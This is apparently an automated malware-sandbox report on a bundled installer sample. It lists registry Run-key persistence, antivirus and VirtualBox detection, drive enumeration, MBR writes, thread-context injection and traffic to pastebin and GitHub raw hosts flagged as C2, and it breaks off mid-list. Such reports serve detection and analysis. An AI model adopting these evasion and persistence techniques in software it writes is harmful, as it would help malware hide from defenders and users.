AVGBrowser.exeAVGBrowser.exeopera.exeopera.exerundll32.exepowershell.exerundll32.exeAVGBrowser.exeopera.exeopera.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\AVGBrowserAutoLaunch_2539D9FFF1F40C0A976762D6C815D3E3 = "\"C:\\Program Files\\AVG\\Browser\\Application\\AVGBrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"Default\"" AVGBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\AVGBrowserAutoLaunch_2539D9FFF1F40C0A976762D6C815D3E3 = "\"C:\\Program Files\\AVG\\Browser\\Application\\AVGBrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"Default\"" AVGBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Opera GX Stable = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Opera GX\\launcher.exe" opera.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Opera GX Stable = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Opera GX\\launcher.exe" opera.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google chrome = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Google chrome.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\AVGBrowserAutoLaunch_2539D9FFF1F40C0A976762D6C815D3E3 = "\"C:\\Program Files\\AVG\\Browser\\Application\\AVGBrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"Default\"" AVGBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Opera GX Stable = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Opera GX\\launcher.exe" opera.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Opera GX Stable = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Opera GX\\launcher.exe" opera.exe -
Checks for any installed AV software in registry 1 TTPs 21 IoCs
Processes:
CheatEngine75.tmpAVGBrowser.exeAVGBrowser.exeAVGBrowser.exeAVGBrowser.exeavg_secure_browser_setup.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\SOFTWARE\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast AVGBrowser.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast AVGBrowser.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus AVGBrowser.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\SOFTWARE\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\Browser\Installed CheatEngine75.tmp Key opened \REGISTRY\MACHINE\Software\AVAST Software\Avast AVGBrowser.exe Key opened \REGISTRY\MACHINE\Software\AVAST Software\Avast AVGBrowser.exe Key opened \REGISTRY\MACHINE\Software\AVAST Software\Avast AVGBrowser.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast avg_secure_browser_setup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast AVGBrowser.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\Browser\Installed CheatEngine75.tmp Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\SOFTWARE\Avira\Browser\Installed CheatEngine75.tmp Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\SOFTWARE\AVAST Software\Avast avg_secure_browser_setup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast AVGBrowser.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus AVGBrowser.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus AVGBrowser.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
rsEDRSvc.exeavg_secure_browser_setup.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA avg_secure_browser_setup.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates connected drives 3 TTPs 35 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
OperaSetup.exeOperaSetup.exersEngineSvc.exemsiexec.exeinstaller.exeOperaGXSetup.exeOperaGXSetup.exersEDRSvc.exedescription ioc Process File opened (read-only) \??\D: OperaSetup.exe File opened (read-only) \??\F: OperaSetup.exe File opened (read-only) \??\D: OperaSetup.exe File opened (read-only) \??\F: rsEngineSvc.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\D: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\D: OperaGXSetup.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\D: OperaGXSetup.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\F: OperaGXSetup.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: OperaSetup.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\F: OperaGXSetup.exe File opened (read-only) \??\F: rsEDRSvc.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs
Processes:
flow ioc 602 pastebin.com 617 pastebin.com 619 pastebin.com 620 pastebin.com 4650 pastebin.com 1 pastebin.com 4 pastebin.com 4649 pastebin.com 4652 pastebin.com 3 pastebin.com 601 pastebin.com 3157 raw.githubusercontent.com 5981 raw.githubusercontent.com 618 pastebin.com 5982 raw.githubusercontent.com 6014 raw.githubusercontent.com -
Modifies powershell logging option 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 9 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
AVGBrowser.exeAFK Journey.exeavg_secure_browser_setup.exeAVGBrowserUpdate.exeAVGBrowser.exeAVGBrowser.exeAVGBrowserUpdate.exeAVGBrowserUpdate.exeAVGBrowser.exedescription ioc Process File opened for modification \??\PhysicalDrive0 AVGBrowser.exe File opened for modification \??\PhysicalDrive0 AFK Journey.exe File opened for modification \??\PhysicalDrive0 avg_secure_browser_setup.exe File opened for modification \??\PhysicalDrive0 AVGBrowserUpdate.exe File opened for modification \??\PhysicalDrive0 AVGBrowser.exe File opened for modification \??\PhysicalDrive0 AVGBrowser.exe File opened for modification \??\PhysicalDrive0 AVGBrowserUpdate.exe File opened for modification \??\PhysicalDrive0 AVGBrowserUpdate.exe File opened for modification \??\PhysicalDrive0 AVGBrowser.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x0005000000030d03-37016.dat autoit_exe -
Checks system information in the registry 2 TTPs 4 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
rsEDRSvc.exeAFK Journey.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer rsEDRSvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer AFK Journey.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName AFK Journey.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName rsEDRSvc.exe -
Drops file in System32 directory 64 IoCs
Processes:
rsEngineSvc.exersEDRSvc.exersVPNSvc.exedescription ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_1FB605FD2412C4F94AD934D8134A28AC rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0E663C78920A8217B4CBE3D45E3E6236_75C1BD04B8F3DBF3882A89F51074A729 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_56DB209C155B5A05FCBF555DF7E6D1BB rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_96B11076AA4494A4A6143129F61AEC8B rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07A7CCFBD28A674D95D3BF853C9007C6 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\206932163209AD483A44477E28192474 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FC68FB72D4FBC7E0F151BC2282D75E47_367FA2447481C3DB640CE44BE2E5A181 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3E3E9689537B6B136ECF210088069D55_EF6C9357BB54DDB629FD2D79F1594F95 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_72E141B285FB40B63D3A51D06AFEB46A rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\439F613B3D55693954E1B080DE3085B4_C4927E03400A4F6EDB9D613E6354F864 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48B35517638A85CA46010B026C2B955A_735A98D70471F3F6240371211712CB5C rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94D97B1EC1F43DD6ED4FE7AB95E144BC_330B78668586CC1C5060B7886AA9A046 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07A7CCFBD28A674D95D3BF853C9007C6 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D11549FC90445E1CE90F96A21958A17_EC4B03A84E582F11EFD1DC6D27A523EE rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\117308CCCD9C93758827D7CC85BB135E rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FA0E447C3E79584EC91182C66BBD2DB7 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3E3E9689537B6B136ECF210088069D55_A925FAB5FFC3CEDB8E62B2DCCBBBB4F2 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_38924EDF39D8802D6946FB22E5DD0835 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_2CDE88B3CC9A35A2EA16DC0201366139 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\74FBF93595CFC8459196065CE54AD928 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_96B11076AA4494A4A6143129F61AEC8B rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3E3E9689537B6B136ECF210088069D55_A925FAB5FFC3CEDB8E62B2DCCBBBB4F2 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_4B7EBDACFF7CEC3D08B5D86C9ECA8639 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\38D10539991D1B84467F968981C3969D_3A58CFC115108405B8F1F6C1914449B7 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_0F90096E7DCB862ED66CE39084FC7811 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_0343D08A98AFAA7CAA7068BD558BE887 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\117308CCCD9C93758827D7CC85BB135E rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554E rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_72E141B285FB40B63D3A51D06AFEB46A rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94D97B1EC1F43DD6ED4FE7AB95E144BC_330B78668586CC1C5060B7886AA9A046 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\74FBF93595CFC8459196065CE54AD928 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\rsVPNSvc\WireGuard\log.bin rsVPNSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_79CFD3DF2894C4BFDA2ADFD6675FA18B rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_0343D08A98AFAA7CAA7068BD558BE887 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48B35517638A85CA46010B026C2B955A_5002FB34C1109443806FF4E1F2461E5E rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48B35517638A85CA46010B026C2B955A_735A98D70471F3F6240371211712CB5C rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0E663C78920A8217B4CBE3D45E3E6236_75C1BD04B8F3DBF3882A89F51074A729 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D7833C286363AD25C70511661A83D581_62105E685A6849BFB2DDCA083B46766C rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_1FB605FD2412C4F94AD934D8134A28AC rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_E6095CD2AECC9011BCD0D7B421356B17 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_E6095CD2AECC9011BCD0D7B421356B17 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_9A347AC5A42F886F9F966873087C7F2E rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_4B7EBDACFF7CEC3D08B5D86C9ECA8639 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_E3A0B2E345AA9F5A174687564C886046 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_9A347AC5A42F886F9F966873087C7F2E rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7850C7BAFAC9456B4B92328A61976502_F90D138DDBB04DFB15FC5AF0B023FF23 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D7833C286363AD25C70511661A83D581_62105E685A6849BFB2DDCA083B46766C rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_0F90096E7DCB862ED66CE39084FC7811 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_38924EDF39D8802D6946FB22E5DD0835 rsEngineSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3E3E9689537B6B136ECF210088069D55_EF6C9357BB54DDB629FD2D79F1594F95 rsEDRSvc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7850C7BAFAC9456B4B92328A61976502_F90D138DDBB04DFB15FC5AF0B023FF23 rsEDRSvc.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
Software 1.30.1.exeSoftware 1.30.1.exeSoftware 1.30.1.exeR0B10X.exepowershell.exedescription pid Process procid_target PID 5740 set thread context of 5856 5740 Software 1.30.1.exe 125 PID 5760 set thread context of 5128 5760 Software 1.30.1.exe 129 PID 372 set thread context of 1012 372 Software 1.30.1.exe 134 PID 10348 set thread context of 7688 10348 R0B10X.exe 953 PID 5880 set thread context of 1388 5880 powershell.exe 1197 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
AFK Journey.exedescription ioc Process File opened (read-only) \??\VBoxMiniRdrDN AFK Journey.exe -
Drops file in Program Files directory 64 IoCs
Processes:
setup.exeAFKJourneyLauncher.exeCheatEngine75.tmpinstaller.exeRAVEndPointProtection-installer.exeRAVVPN-installer.exeAVGBrowserUpdateSetup.exeSaferWeb-installer.exeAVGBrowser.exeafkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exeopera.exedescription ioc Process File opened for modification C:\Program Files\Crashpad\settings.dat setup.exe File created C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\sharedassets0.assets AFKJourneyLauncher.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\UnityCrashHandler64.exe AFKJourneyLauncher.exe File created C:\Program Files\Cheat Engine 7.5\is-SCU4N.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-0CQQG.tmp CheatEngine75.tmp File created C:\Program Files\McAfee\Temp1962996300\installer.exe installer.exe File created C:\Program Files\ReasonLabs\EPP\133608815283178726\System.IO.IsolatedStorage.dll RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\VPN\netstandard.dll RAVVPN-installer.exe File created C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\StreamingAssets\aa\StandaloneWindows64\187162333178423124.bundle AFKJourneyLauncher.exe File created C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\StreamingAssets\aa\StandaloneWindows64\4051152068772706218.bundle AFKJourneyLauncher.exe File created C:\Program Files (x86)\GUM701C.tmp\goopdateres_vi.dll AVGBrowserUpdateSetup.exe File created C:\Program Files\Cheat Engine 7.5\include\is-KM9G0.tmp CheatEngine75.tmp File created C:\Program Files\ReasonLabs\DNS\rsDatabase.dll SaferWeb-installer.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping13056_542816678\AL AVGBrowser.exe File created C:\Program Files (x86)\AFK Journey\resource\img\btn_close.png afkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exe File opened for modification C:\Program Files (x86)\AFK Journey\resource\lang\lang.xml afkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exe File opened for modification C:\Program Files (x86)\AFK Journey\save\setting.dat AFKJourneyLauncher.exe File created C:\Program Files\ReasonLabs\EPP\133608815283178726\System.DirectoryServices.dll RAVEndPointProtection-installer.exe File opened for modification C:\Program Files (x86)\AFK Journey\resource afkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exe File created C:\Program Files\ReasonLabs\EPP\133608815283178726\rsEngine.Performance.dll RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\VPN\WireGuard\arm64\tunnel.dll RAVVPN-installer.exe File created C:\Program Files (x86)\AFK Journey\save\res_config.json.efdindex AFKJourneyLauncher.exe File created C:\Program Files\McAfee\Temp1962996300\jslang\eula-pl-PL.txt installer.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping13056_542816678\_metadata\verified_contents.json AVGBrowser.exe File created C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\sharedassets0.assets.resS AFKJourneyLauncher.exe File created C:\Program Files\ReasonLabs\EPP\System.Net.WebSockets.dll RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\EPP\x64\7z64.dll RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\VPN\OpenVPN\legacy\amd64\tap0901.sys RAVVPN-installer.exe File created C:\Program Files (x86)\AFK Journey\resource\xml\toolbar.xml afkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping13056_1930699136\_metadata\verified_contents.json AVGBrowser.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\StreamingAssets\aa\StandaloneWindows64\17374563601605350347.bundle AFKJourneyLauncher.exe File created C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\StreamingAssets\aa\StandaloneWindows64\13278572447783893631.bundle AFKJourneyLauncher.exe File created C:\Program Files\McAfee\Temp1962996300\analyticsmanager.cab installer.exe File created C:\Program Files\ReasonLabs\EPP\133608815283178726\EDR\System.Data.SQLite.dll RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\DNS\rsEngine.Utilities.dll SaferWeb-installer.exe File created C:\Program Files\ReasonLabs\DNS\x86\lz4_x86.dll SaferWeb-installer.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\locales\bg.pak AFKJourneyLauncher.exe File created C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\StreamingAssets\ui\icon\preinstall\spui_tempres_heirloom.png AFKJourneyLauncher.exe File created C:\Program Files\ReasonLabs\Common\Client\v1.4.2\locales\ta.pak RAVEndPointProtection-installer.exe File created C:\Program Files\ReasonLabs\VPN\RestEase.dll RAVVPN-installer.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping13056_542816678\MV AVGBrowser.exe File opened for modification C:\Program Files (x86)\AFK Journey\resource\lang\de.js afkjourneysetup_f78bf3faedfb1ebbc23cdffa53d171fe.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\locales\id.pak AFKJourneyLauncher.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\locales\pt-PT.pak AFKJourneyLauncher.exe File opened for modification C:\Program Files (x86)\AFK Journey\AFKJourney Game\game\AFK Journey_Data\Plugins\x86_64\LIMPC\locales\zh-TW.pak AFKJourneyLauncher.exe File created C:\Program Files\McAfee\Temp1962996300\jslang\wa-res-install-en-US.js installer.exe File created C:\Program Files (x86)\AFK 